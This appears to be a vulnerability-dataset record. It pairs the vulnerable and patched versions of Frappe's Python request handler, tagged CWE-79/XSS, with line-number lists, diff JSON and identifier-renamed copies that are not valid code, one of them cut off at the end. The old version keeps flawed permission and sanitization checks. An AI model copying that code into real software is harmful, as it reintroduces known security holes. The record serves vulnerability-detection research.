3279,
3283,
3286,
3292,
3298,
3300,
3308,
1,
2,
3,
4,
5,
6,
7,
119,
120,
121,
122,
144,
145,
146,
147,
148,
149,
150,
151,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
211,
225,
226,
227,
228,
229,
230,
231,
250,
251,
252,
253,
254,
255,
256,
285,
286,
287,
288,
289,
290,
291,
292,
293,
294,
295,
296,
297,
298,
299,
300,
301,
427,
428,
429,
439,
440,
441,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
477,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
509,
510,
511,
512,
513,
514,
515,
516,
517,
518,
577,
578,
579,
580,
581,
582,
583,
584,
585,
586,
587,
588,
589,
590,
591,
592,
593,
594,
595,
596,
597,
598,
599,
600,
601,
602,
603,
604,
605,
606,
607,
608,
609,
610,
611,
612,
746,
747,
748,
749,
750,
751,
752,
753,
828,
829,
830,
831,
832,
833,
834,
835,
836,
837,
838,
904,
905,
906,
907,
908,
909,
910,
911,
912,
913,
914,
915,
916,
917,
918,
919,
920,
921,
956,
957,
958,
959,
960,
961,
962,
963,
964,
965,
966,
1002,
1003,
1004,
1022,
1023,
1024,
1053,
1054,
1055,
1094,
1095,
1096,
1131,
1132,
1133,
1143,
1144,
1145,
1160,
1161,
1162,
1163,
1164,
1165,
1166,
1167,
1201,
1202,
1203,
1204,
1205,
1206,
1207,
1208,
1294,
1295,
1296,
1297,
1298,
1299,
1300,
1301,
1327,
1328,
1329,
1330,
1331,
1371,
1372,
1373,
1403,
1404,
1405,
1428,
1429,
1430,
1453,
1454,
1455,
1478,
1479,
1480,
1509,
1510,
1511,
1512,
1513,
1514,
1515,
1516,
1517,
1518,
1519,
1520,
1521,
1522,
1523,
1524,
1554,
1555,
1556,
1557,
1558,
1559,
1560,
1573,
1574,
1575,
1576,
1586,
1587,
1588,
1609,
1610,
1611,
1789,
1790,
1791,
1820,
1821,
1822,
1850,
1851,
1852,
1889,
1890,
1891,
1892,
1893,
1894,
1895,
1896,
1897,
1920,
1921,
1922,
1923,
1924,
1925,
1926,
1927,
1928,
1929,
1930,
1931,
1932,
1933,
1934,
1935,
1936,
2006,
2007,
2008,
2009,
2010,
2011,
2012,
2013,
2014,
2015,
2016,
2017,
2018,
2019,
2020,
2074,
2075,
2076,
2077,
2078,
2079,
2080,
2081,
2082,
2083,
2084,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2139,
2182,
2183,
2184,
2201,
2202,
2203,
2220,
2221,
2222,
2223,
2224,
2225,
2226,
2227,
2228,
2266,
2267,
2268,
2269,
2270,
2271,
2272,
2301,
2302,
2303,
2322,
2323,
2324,
2343,
2344,
2345,
2369,
2370,
2371,
2391,
2392,
2393,
2394,
2395,
2396,
2397,
2419,
2420,
2421,
2422,
2423,
2424,
2425,
2426,
2427,
2428,
2483,
2484,
2485,
2486,
2487,
2488,
2489,
2490,
2491,
2545,
2546,
2547,
2548,
2549,
2550,
2551,
2552,
2553,
2554,
2555,
2556,
2557,
2600,
2601,
2602,
2614,
2615,
2616,
2631,
2632,
2633,
2653,
2654,
2655,
2680,
2681,
2682,
2695,
2696,
2697,
2698,
2705,
2706,
2707,
2708,
2709,
2710,
2711,
2712,
2713,
2714,
2724,
2725,
2726,
2727,
2728,
2729,
2730,
2731,
2732,
2733,
2734,
2735,
2745,
2746,
2747,
2748,
2749,
2750,
2751,
2752,
2753,
2762,
2763,
2764,
2765,
2766,
2767,
2768,
2769,
2770,
2782,
2783,
2784,
2785,
2807,
2808,
2809,
2827,
2828,
2829,
2830,
2865,
2866,
2867,
2868,
2869,
2870,
2871,
2898,
2899,
2900,
2901,
2902,
2903,
2904,
2905,
2906,
2940,
2941,
2942,
2943,
2944,
2945,
2946,
2947,
2948,
2975,
2976,
2977,
2978,
2979,
2980,
2981,
2982,
2995,
2996,
2997,
2998,
2999,
3000,
3010,
3011,
3012,
3013,
3014,
3015,
3016,
3017,
3038,
3039,
3040,
3041,
3042,
3043,
3044,
3045,
3046,
3080,
3081,
3082,
3083,
3084,
3085,
3086,
3087,
3088,
3089,
3090,
3091,
3092,
3093,
3175,
3176,
3177,
3178,
3179,
3180,
3181,
3209,
3210,
3211,
3212,
3213,
3214,
3215,
3216,
3256,
3257,
3258,
3259,
3260,
3261,
3262,
3263,
3281,
3282,
3283,
3284,
3285,
3286,
3287,
3288,
3289,
3290,
933,
1859,
2461,
3102,
3103,
3104,
1336,
1337,
1338
] |
1CWE-79
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
import frappe.utils
import frappe.sessions
import frappe.desk.form.run_method
from frappe.utils.response import build_response
from frappe.api import validate_auth
from frappe.utils import cint
from frappe.core.doctype.server_script.server_script_utils import run_server_script_api
from werkzeug.wrappers import Response
from six import string_types
ALLOWED_MIMETYPES = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def handle():
"""handle request"""
validate_auth()
cmd = frappe.local.form_dict.cmd
data = None
if cmd!='login':
data = execute_cmd(cmd)
# data can be an empty string or list which are valid responses
if data is not None:
if isinstance(data, Response):
# method returns a response object, pass it on
return data
# add the response to `message` label
frappe.response['message'] = data
return build_response("json")
def execute_cmd(cmd, from_async=False):
"""execute a request as python module"""
for hook in frappe.get_hooks("override_whitelisted_methods", {}).get(cmd, []):
# override using the first hook
cmd = hook
break
# via server script
if run_server_script_api(cmd):
return None
try:
method = get_attr(cmd)
except Exception as e:
if frappe.local.conf.developer_mode:
raise e
else:
frappe.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if from_async:
method = method.queue
is_whitelisted(method)
is_valid_http_method(method)
return frappe.call(method, **frappe.form_dict)
def is_valid_http_method(method):
http_method = frappe.local.request.method
if http_method not in frappe.allowed_http_methods_for_whitelisted_func[method]:
frappe.throw(_("Not permitted"), frappe.PermissionError)
def is_whitelisted(method):
# check if whitelisted
if frappe.session['user'] == 'Guest':
if (method not in frappe.guest_methods):
frappe.throw(_("Not permitted"), frappe.PermissionError)
if method not in frappe.xss_safe_methods:
# strictly sanitize form_dict
# escapes html characters like <> except for predefined tags like a, b, ul etc.
for key, value in frappe.form_dict.items():
if isinstance(value, string_types):
frappe.form_dict[key] = frappe.utils.sanitize_html(value)
else:
if not method in frappe.whitelisted:
frappe.throw(_("Not permitted"), frappe.PermissionError)
@frappe.whitelist(allow_guest=True)
def version():
return frappe.__version__
@frappe.whitelist()
def runserverobj(method, docs=None, dt=None, dn=None, arg=None, args=None):
frappe.desk.form.run_method.runserverobj(method, docs=docs, dt=dt, dn=dn, arg=arg, args=args)
@frappe.whitelist(allow_guest=True)
def logout():
frappe.local.login_manager.logout()
frappe.db.commit()
@frappe.whitelist(allow_guest=True)
def web_logout():
frappe.local.login_manager.logout()
frappe.db.commit()
frappe.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@frappe.whitelist(allow_guest=True)
def run_custom_method(doctype, name, custom_method):
"""cmd=run_custom_method&doctype={doctype}&name={name}&custom_method={custom_method}"""
doc = frappe.get_doc(doctype, name)
if getattr(doc, custom_method, frappe._dict()).is_whitelisted:
frappe.call(getattr(doc, custom_method), **frappe.local.form_dict)
else:
frappe.throw(_("Not permitted"), frappe.PermissionError)
@frappe.whitelist()
def uploadfile():
ret = None
try:
if frappe.form_dict.get('from_form'):
try:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_name": frappe.form_dict.docname,
"attached_to_doctype": frappe.form_dict.doctype,
"attached_to_field": frappe.form_dict.docfield,
"file_url": frappe.form_dict.file_url,
"file_name": frappe.form_dict.filename,
"is_private": frappe.utils.cint(frappe.form_dict.is_private),
"content": frappe.form_dict.filedata,
"decode": True
})
ret.save()
except frappe.DuplicateEntryError:
# ignore pass
ret = None
frappe.db.rollback()
else:
if frappe.form_dict.get('method'):
method = frappe.get_attr(frappe.form_dict.method)
is_whitelisted(method)
ret = method()
except Exception:
frappe.errprint(frappe.utils.get_traceback())
frappe.response['http_status_code'] = 500
ret = None
return ret
@frappe.whitelist(allow_guest=True)
def upload_file():
user = None
if frappe.session.user == 'Guest':
if frappe.get_system_settings('allow_guests_to_upload_files'):
ignore_permissions = True
else:
return
else:
user = frappe.get_doc("User", frappe.session.user)
ignore_permissions = False
files = frappe.request.files
is_private = frappe.form_dict.is_private
doctype = frappe.form_dict.doctype
docname = frappe.form_dict.docname
fieldname = frappe.form_dict.fieldname
file_url = frappe.form_dict.file_url
folder = frappe.form_dict.folder or 'Home'
method = frappe.form_dict.method
content = None
filename = None
if 'file' in files:
file = files['file']
content = file.stream.read()
filename = file.filename
frappe.local.uploaded_file = content
frappe.local.uploaded_filename = filename
if frappe.session.user == 'Guest' or (user and not user.has_desk_access()):
import mimetypes
filetype = mimetypes.guess_type(filename)[0]
if filetype not in ALLOWED_MIMETYPES:
frappe.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if method:
method = frappe.get_attr(method)
is_whitelisted(method)
return method()
else:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_doctype": doctype,
"attached_to_name": docname,
"attached_to_field": fieldname,
"folder": folder,
"file_name": filename,
"file_url": file_url,
"is_private": cint(is_private),
"content": content
})
ret.save(ignore_permissions=ignore_permissions)
return ret
def get_attr(cmd):
"""get method object from cmd"""
if '.' in cmd:
method = frappe.get_attr(cmd)
else:
method = globals()[cmd]
frappe.log("method:" + cmd)
return method
@frappe.whitelist(allow_guest = True)
def ping():
return "pong"
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
from werkzeug.wrappers import Response
from six import text_type, string_types, StringIO
import frappe
import frappe.utils
import frappe.sessions
import frappe.desk.form.run_method
from frappe.utils import cint
from frappe.api import validate_auth
from frappe import _, is_whitelisted
from frappe.utils.response import build_response
from frappe.utils.csvutils import build_csv_response
from frappe.core.doctype.server_script.server_script_utils import run_server_script_api
ALLOWED_MIMETYPES = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def handle():
"""handle request"""
validate_auth()
cmd = frappe.local.form_dict.cmd
data = None
if cmd!='login':
data = execute_cmd(cmd)
# data can be an empty string or list which are valid responses
if data is not None:
if isinstance(data, Response):
# method returns a response object, pass it on
return data
# add the response to `message` label
frappe.response['message'] = data
return build_response("json")
def execute_cmd(cmd, from_async=False):
"""execute a request as python module"""
for hook in frappe.get_hooks("override_whitelisted_methods", {}).get(cmd, []):
# override using the first hook
cmd = hook
break
# via server script
if run_server_script_api(cmd):
return None
try:
method = get_attr(cmd)
except Exception as e:
if frappe.local.conf.developer_mode:
raise e
else:
frappe.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if from_async:
method = method.queue
if method != run_doc_method:
is_whitelisted(method)
is_valid_http_method(method)
return frappe.call(method, **frappe.form_dict)
def is_valid_http_method(method):
http_method = frappe.local.request.method
if http_method not in frappe.allowed_http_methods_for_whitelisted_func[method]:
frappe.throw(_("Not permitted"), frappe.PermissionError)
@frappe.whitelist(allow_guest=True)
def version():
return frappe.__version__
@frappe.whitelist(allow_guest=True)
def logout():
frappe.local.login_manager.logout()
frappe.db.commit()
@frappe.whitelist(allow_guest=True)
def web_logout():
frappe.local.login_manager.logout()
frappe.db.commit()
frappe.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@frappe.whitelist()
def uploadfile():
ret = None
try:
if frappe.form_dict.get('from_form'):
try:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_name": frappe.form_dict.docname,
"attached_to_doctype": frappe.form_dict.doctype,
"attached_to_field": frappe.form_dict.docfield,
"file_url": frappe.form_dict.file_url,
"file_name": frappe.form_dict.filename,
"is_private": frappe.utils.cint(frappe.form_dict.is_private),
"content": frappe.form_dict.filedata,
"decode": True
})
ret.save()
except frappe.DuplicateEntryError:
# ignore pass
ret = None
frappe.db.rollback()
else:
if frappe.form_dict.get('method'):
method = frappe.get_attr(frappe.form_dict.method)
is_whitelisted(method)
ret = method()
except Exception:
frappe.errprint(frappe.utils.get_traceback())
frappe.response['http_status_code'] = 500
ret = None
return ret
@frappe.whitelist(allow_guest=True)
def upload_file():
user = None
if frappe.session.user == 'Guest':
if frappe.get_system_settings('allow_guests_to_upload_files'):
ignore_permissions = True
else:
return
else:
user = frappe.get_doc("User", frappe.session.user)
ignore_permissions = False
files = frappe.request.files
is_private = frappe.form_dict.is_private
doctype = frappe.form_dict.doctype
docname = frappe.form_dict.docname
fieldname = frappe.form_dict.fieldname
file_url = frappe.form_dict.file_url
folder = frappe.form_dict.folder or 'Home'
method = frappe.form_dict.method
content = None
filename = None
if 'file' in files:
file = files['file']
content = file.stream.read()
filename = file.filename
frappe.local.uploaded_file = content
frappe.local.uploaded_filename = filename
if frappe.session.user == 'Guest' or (user and not user.has_desk_access()):
import mimetypes
filetype = mimetypes.guess_type(filename)[0]
if filetype not in ALLOWED_MIMETYPES:
frappe.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if method:
method = frappe.get_attr(method)
is_whitelisted(method)
return method()
else:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_doctype": doctype,
"attached_to_name": docname,
"attached_to_field": fieldname,
"folder": folder,
"file_name": filename,
"file_url": file_url,
"is_private": cint(is_private),
"content": content
})
ret.save(ignore_permissions=ignore_permissions)
return ret
def get_attr(cmd):
"""get method object from cmd"""
if '.' in cmd:
method = frappe.get_attr(cmd)
else:
method = globals()[cmd]
frappe.log("method:" + cmd)
return method
@frappe.whitelist(allow_guest=True)
def ping():
return "pong"
@frappe.whitelist()
def run_doc_method(method, docs=None, dt=None, dn=None, arg=None, args=None):
"""run controller method - old style"""
import json, inspect
if not args: args = arg or ""
if dt: # not called from a doctype (from a page)
if not dn: dn = dt # single
doc = frappe.get_doc(dt, dn)
else:
doc = frappe.get_doc(json.loads(docs))
doc._original_modified = doc.modified
doc.check_if_latest()
if not doc.has_permission("read"):
frappe.msgprint(_("Not permitted"), raise_exception = True)
if not doc:
return
try:
args = json.loads(args)
except ValueError:
args = args
method_obj = getattr(doc, method)
is_whitelisted(getattr(method_obj, '__func__', method_obj))
try:
fnargs = inspect.getargspec(method_obj)[0]
except ValueError:
fnargs = inspect.getfullargspec(method_obj).args
if not fnargs or (len(fnargs)==1 and fnargs[0]=="self"):
r = doc.run_method(method)
elif "args" in fnargs or not isinstance(args, dict):
r = doc.run_method(method, args)
else:
r = doc.run_method(method, **args)
frappe.response.docs.append(doc)
if not r:
return
# build output as csv
if cint(frappe.form_dict.get('as_csv')):
build_csv_response(r, doc.doctype.replace(' ', ''))
return
frappe.response['message'] = r
# for backwards compatibility
runserverobj = run_doc_method
| xss | {
"code": [
"from frappe import _",
"from frappe.utils.response import build_response",
"from frappe.api import validate_auth",
"from werkzeug.wrappers import Response",
"from six import string_types",
"\tis_whitelisted(method)",
"\tis_valid_http_method(method)",
"def is_whitelisted(method):",
"\tif frappe.session['user'] == 'Guest':",
"\t\tif (method not in frappe.guest_methods):",
"\t\t\tfrappe.throw(_(\"Not permitted\"), frappe.PermissionError)",
"\t\tif method not in frappe.xss_safe_methods:",
"\t\t\tfor key, value in frappe.form_dict.items():",
"\t\t\t\tif isinstance(value, string_types):",
"\t\t\t\t\tfrappe.form_dict[key] = frappe.utils.sanitize_html(value)",
"\telse:",
"\t\tif not method in frappe.whitelisted:",
"\t\t\tfrappe.throw(_(\"Not permitted\"), frappe.PermissionError)",
"@frappe.whitelist()",
"def runserverobj(method, docs=None, dt=None, dn=None, arg=None, args=None):",
"\tfrappe.desk.form.run_method.runserverobj(method, docs=docs, dt=dt, dn=dn, arg=arg, args=args)",
"@frappe.whitelist(allow_guest=True)",
"def run_custom_method(doctype, name, custom_method):",
"\tdoc = frappe.get_doc(doctype, name)",
"\tif getattr(doc, custom_method, frappe._dict()).is_whitelisted:",
"\t\tfrappe.call(getattr(doc, custom_method), **frappe.local.form_dict)",
"\telse:",
"\t\tfrappe.throw(_(\"Not permitted\"), frappe.PermissionError)",
"@frappe.whitelist(allow_guest = True)"
],
"line_no": [
6,
10,
11,
14,
15,
67,
68,
78,
80,
81,
82,
84,
87,
88,
89,
91,
92,
93,
99,
100,
101,
115,
116,
118,
119,
120,
121,
122,
225
]
} | {
"code": [
"from werkzeug.wrappers import Response",
"from six import text_type, string_types, StringIO",
"from frappe.api import validate_auth",
"from frappe.utils.response import build_response",
"from frappe.utils.csvutils import build_csv_response",
"\tif method != run_doc_method:",
"\t\tis_whitelisted(method)",
"@frappe.whitelist(allow_guest=True)",
"@frappe.whitelist()",
"def run_doc_method(method, docs=None, dt=None, dn=None, arg=None, args=None):",
"\t\"\"\"run controller method - old style\"\"\"",
"\timport json, inspect",
"\tif not args: args = arg or \"\"",
"\telse:",
"\t\tdoc._original_modified = doc.modified",
"\t\tdoc.check_if_latest()",
"\tif not doc.has_permission(\"read\"):",
"\t\tfrappe.msgprint(_(\"Not permitted\"), raise_exception = True)",
"\t\treturn",
"\ttry:",
"\texcept ValueError:",
"\t\targs = args",
"\tmethod_obj = getattr(doc, method)",
"\tis_whitelisted(getattr(method_obj, '__func__', method_obj))",
"\ttry:",
"\t\tfnargs = inspect.getargspec(method_obj)[0]",
"\texcept ValueError:",
"\t\tfnargs = inspect.getfullargspec(method_obj).args",
"\tif not fnargs or (len(fnargs)==1 and fnargs[0]==\"self\"):",
"\t\tr = doc.run_method(method)",
"\telif \"args\" in fnargs or not isinstance(args, dict):",
"\t\tr = doc.run_method(method, args)",
"\telse:",
"\t\tr = doc.run_method(method, **args)",
"\tfrappe.response.docs.append(doc)",
"\tif not r:",
"\t\treturn",
"\tif cint(frappe.form_dict.get('as_csv')):",
"\t\tbuild_csv_response(r, doc.doctype.replace(' ', ''))",
"\t\treturn",
"\tfrappe.response['message'] = r",
"runserverobj = run_doc_method"
],
"line_no": [
6,
7,
15,
17,
18,
72,
73,
201,
205,
206,
207,
208,
210,
216,
218,
219,
221,
222,
225,
227,
229,
230,
232,
233,
235,
236,
237,
238,
240,
241,
243,
244,
246,
247,
249,
251,
252,
255,
256,
257,
259,
262
]
} |
from __future__ import unicode_literals
import .frappe
from VAR_25 import _
import .frappe.utils
import .frappe.sessions
import .frappe.desk.form.run_method
from VAR_25.utils.response import build_response
from VAR_25.api import validate_auth
from VAR_25.utils import cint
from VAR_25.core.doctype.server_script.server_script_utils import run_server_script_api
from werkzeug.wrappers import Response
from six import string_types
VAR_0 = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def FUNC_0():
validate_auth()
VAR_1 = VAR_25.local.form_dict.cmd
VAR_12 = None
if VAR_1!='login':
VAR_12 = FUNC_1(VAR_1)
if VAR_12 is not None:
if isinstance(VAR_12, Response):
return VAR_12
VAR_25.response['message'] = VAR_12
return build_response("json")
def FUNC_1(VAR_1, VAR_2=False):
for hook in VAR_25.get_hooks("override_whitelisted_methods", {}).get(VAR_1, []):
VAR_1 = hook
break
if run_server_script_api(VAR_1):
return None
try:
VAR_3 = FUNC_11(VAR_1)
except Exception as e:
if VAR_25.local.conf.developer_mode:
raise e
else:
VAR_25.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if VAR_2:
VAR_3 = method.queue
FUNC_3(VAR_3)
FUNC_2(VAR_3)
return VAR_25.call(VAR_3, **VAR_25.form_dict)
def FUNC_2(VAR_3):
VAR_13 = VAR_25.local.request.method
if VAR_13 not in VAR_25.allowed_http_methods_for_whitelisted_func[VAR_3]:
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
def FUNC_3(VAR_3):
if VAR_25.session['user'] == 'Guest':
if (VAR_3 not in VAR_25.guest_methods):
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
if VAR_3 not in VAR_25.xss_safe_methods:
for VAR_29, value in VAR_25.form_dict.items():
if isinstance(value, string_types):
VAR_25.form_dict[VAR_29] = VAR_25.utils.sanitize_html(value)
else:
if not VAR_3 in VAR_25.whitelisted:
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
@VAR_25.whitelist(allow_guest=True)
def FUNC_4():
return VAR_25.__version__
@VAR_25.whitelist()
def FUNC_5(VAR_3, VAR_4=None, VAR_5=None, VAR_6=None, VAR_7=None, VAR_8=None):
VAR_25.desk.form.run_method.runserverobj(VAR_3, VAR_4=docs, VAR_5=dt, VAR_6=dn, VAR_7=arg, VAR_8=args)
@VAR_25.whitelist(allow_guest=True)
def FUNC_6():
VAR_25.local.login_manager.logout()
VAR_25.db.commit()
@VAR_25.whitelist(allow_guest=True)
def FUNC_7():
VAR_25.local.login_manager.logout()
VAR_25.db.commit()
VAR_25.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@VAR_25.whitelist(allow_guest=True)
def FUNC_8(VAR_9, VAR_10, VAR_11):
VAR_14 = VAR_25.get_doc(VAR_9, VAR_10)
if getattr(VAR_14, VAR_11, VAR_25._dict()).is_whitelisted:
VAR_25.call(getattr(VAR_14, VAR_11), **VAR_25.local.form_dict)
else:
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
@VAR_25.whitelist()
def FUNC_9():
VAR_15 = None
try:
if VAR_25.form_dict.get('from_form'):
try:
VAR_15 = VAR_25.get_doc({
"doctype": "File",
"attached_to_name": VAR_25.form_dict.docname,
"attached_to_doctype": VAR_25.form_dict.doctype,
"attached_to_field": VAR_25.form_dict.docfield,
"file_url": VAR_25.form_dict.file_url,
"file_name": VAR_25.form_dict.filename,
"is_private": VAR_25.utils.cint(VAR_25.form_dict.is_private),
"content": VAR_25.form_dict.filedata,
"decode": True
})
VAR_15.save()
except VAR_25.DuplicateEntryError:
VAR_15 = None
VAR_25.db.rollback()
else:
if VAR_25.form_dict.get('method'):
VAR_3 = VAR_25.get_attr(VAR_25.form_dict.method)
FUNC_3(VAR_3)
VAR_15 = VAR_3()
except Exception:
VAR_25.errprint(VAR_25.utils.get_traceback())
VAR_25.response['http_status_code'] = 500
VAR_15 = None
return VAR_15
@VAR_25.whitelist(allow_guest=True)
def FUNC_10():
VAR_16 = None
if VAR_25.session.user == 'Guest':
if VAR_25.get_system_settings('allow_guests_to_upload_files'):
VAR_26 = True
else:
return
else:
VAR_16 = VAR_25.get_doc("User", VAR_25.session.user)
VAR_26 = False
VAR_17 = VAR_25.request.files
VAR_18 = VAR_25.form_dict.is_private
VAR_9 = VAR_25.form_dict.doctype
VAR_19 = VAR_25.form_dict.docname
VAR_20 = VAR_25.form_dict.fieldname
VAR_21 = VAR_25.form_dict.file_url
VAR_22 = VAR_25.form_dict.folder or 'Home'
VAR_3 = VAR_25.form_dict.method
VAR_23 = None
VAR_24 = None
if 'file' in VAR_17:
VAR_27 = VAR_17['file']
VAR_23 = VAR_27.stream.read()
VAR_24 = VAR_27.filename
VAR_25.local.uploaded_file = VAR_23
VAR_25.local.uploaded_filename = VAR_24
if VAR_25.session.user == 'Guest' or (VAR_16 and not VAR_16.has_desk_access()):
import mimetypes
VAR_28 = mimetypes.guess_type(VAR_24)[0]
if VAR_28 not in VAR_0:
VAR_25.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if VAR_3:
VAR_3 = VAR_25.get_attr(VAR_3)
FUNC_3(VAR_3)
return VAR_3()
else:
VAR_15 = VAR_25.get_doc({
"doctype": "File",
"attached_to_doctype": VAR_9,
"attached_to_name": VAR_19,
"attached_to_field": VAR_20,
"folder": VAR_22,
"file_name": VAR_24,
"file_url": VAR_21,
"is_private": cint(VAR_18),
"content": VAR_23
})
VAR_15.save(VAR_26=ignore_permissions)
return VAR_15
def FUNC_11(VAR_1):
if '.' in VAR_1:
VAR_3 = VAR_25.get_attr(VAR_1)
else:
VAR_3 = globals()[VAR_1]
VAR_25.log("method:" + VAR_1)
return VAR_3
@VAR_25.whitelist(allow_guest = True)
def FUNC_12():
return "pong"
|
from __future__ import unicode_literals
from werkzeug.wrappers import Response
from six import text_type, string_types, StringIO
import .frappe
import .frappe.utils
import .frappe.sessions
import .frappe.desk.form.run_method
from VAR_24.utils import cint
from VAR_24.api import validate_auth
from VAR_24 import _, is_whitelisted
from VAR_24.utils.response import build_response
from VAR_24.utils.csvutils import build_csv_response
from VAR_24.core.doctype.server_script.server_script_utils import .run_server_script_api
VAR_0 = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def FUNC_0():
validate_auth()
VAR_1 = VAR_24.local.form_dict.cmd
VAR_10 = None
if VAR_1!='login':
VAR_10 = FUNC_1(VAR_1)
if VAR_10 is not None:
if isinstance(VAR_10, Response):
return VAR_10
VAR_24.response['message'] = VAR_10
return build_response("json")
def FUNC_1(VAR_1, VAR_2=False):
for hook in VAR_24.get_hooks("override_whitelisted_methods", {}).get(VAR_1, []):
VAR_1 = hook
break
if run_server_script_api(VAR_1):
return None
try:
VAR_3 = FUNC_8(VAR_1)
except Exception as e:
if VAR_24.local.conf.developer_mode:
raise e
else:
VAR_24.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if VAR_2:
VAR_3 = method.queue
if VAR_3 != FUNC_10:
is_whitelisted(VAR_3)
FUNC_2(VAR_3)
return VAR_24.call(VAR_3, **VAR_24.form_dict)
def FUNC_2(VAR_3):
VAR_11 = VAR_24.local.request.method
if VAR_11 not in VAR_24.allowed_http_methods_for_whitelisted_func[VAR_3]:
VAR_24.throw(_("Not permitted"), VAR_24.PermissionError)
@VAR_24.whitelist(allow_guest=True)
def FUNC_3():
return VAR_24.__version__
@VAR_24.whitelist(allow_guest=True)
def FUNC_4():
VAR_24.local.login_manager.logout()
VAR_24.db.commit()
@VAR_24.whitelist(allow_guest=True)
def FUNC_5():
VAR_24.local.login_manager.logout()
VAR_24.db.commit()
VAR_24.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@VAR_24.whitelist()
def FUNC_6():
VAR_12 = None
try:
if VAR_24.form_dict.get('from_form'):
try:
VAR_12 = VAR_24.get_doc({
"doctype": "File",
"attached_to_name": VAR_24.form_dict.docname,
"attached_to_doctype": VAR_24.form_dict.doctype,
"attached_to_field": VAR_24.form_dict.docfield,
"file_url": VAR_24.form_dict.file_url,
"file_name": VAR_24.form_dict.filename,
"is_private": VAR_24.utils.cint(VAR_24.form_dict.is_private),
"content": VAR_24.form_dict.filedata,
"decode": True
})
VAR_12.save()
except VAR_24.DuplicateEntryError:
VAR_12 = None
VAR_24.db.rollback()
else:
if VAR_24.form_dict.get('method'):
VAR_3 = VAR_24.get_attr(VAR_24.form_dict.method)
is_whitelisted(VAR_3)
VAR_12 = VAR_3()
except Exception:
VAR_24.errprint(VAR_24.utils.get_traceback())
VAR_24.response['http_status_code'] = 500
VAR_12 = None
return VAR_12
@VAR_24.whitelist(allow_guest=True)
def FUNC_7():
VAR_13 = None
if VAR_24.session.user == 'Guest':
if VAR_24.get_system_settings('allow_guests_to_upload_files'):
VAR_25 = True
else:
return
else:
VAR_13 = VAR_24.get_doc("User", VAR_24.session.user)
VAR_25 = False
VAR_14 = VAR_24.request.files
VAR_15 = VAR_24.form_dict.is_private
VAR_16 = VAR_24.form_dict.doctype
VAR_17 = VAR_24.form_dict.docname
VAR_18 = VAR_24.form_dict.fieldname
VAR_19 = VAR_24.form_dict.file_url
VAR_20 = VAR_24.form_dict.folder or 'Home'
VAR_3 = VAR_24.form_dict.method
VAR_21 = None
VAR_22 = None
if 'file' in VAR_14:
VAR_26 = VAR_14['file']
VAR_21 = VAR_26.stream.read()
VAR_22 = VAR_26.filename
VAR_24.local.uploaded_file = VAR_21
VAR_24.local.uploaded_filename = VAR_22
if VAR_24.session.user == 'Guest' or (VAR_13 and not VAR_13.has_desk_access()):
import mimetypes
VAR_27 = mimetypes.guess_type(VAR_22)[0]
if VAR_27 not in VAR_0:
VAR_24.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if VAR_3:
VAR_3 = VAR_24.get_attr(VAR_3)
is_whitelisted(VAR_3)
return VAR_3()
else:
VAR_12 = VAR_24.get_doc({
"doctype": "File",
"attached_to_doctype": VAR_16,
"attached_to_name": VAR_17,
"attached_to_field": VAR_18,
"folder": VAR_20,
"file_name": VAR_22,
"file_url": VAR_19,
"is_private": cint(VAR_15),
"content": VAR_21
})
VAR_12.save(VAR_25=ignore_permissions)
return VAR_12
def FUNC_8(VAR_1):
if '.' in VAR_1:
VAR_3 = VAR_24.get_attr(VAR_1)
else:
VAR_3 = globals()[VAR_1]
VAR_24.log("method:" + VAR_1)
return VAR_3
@VAR_24.whitelist(allow_guest=True)
def FUNC_9():
return "pong"
@VAR_24.whitelist()
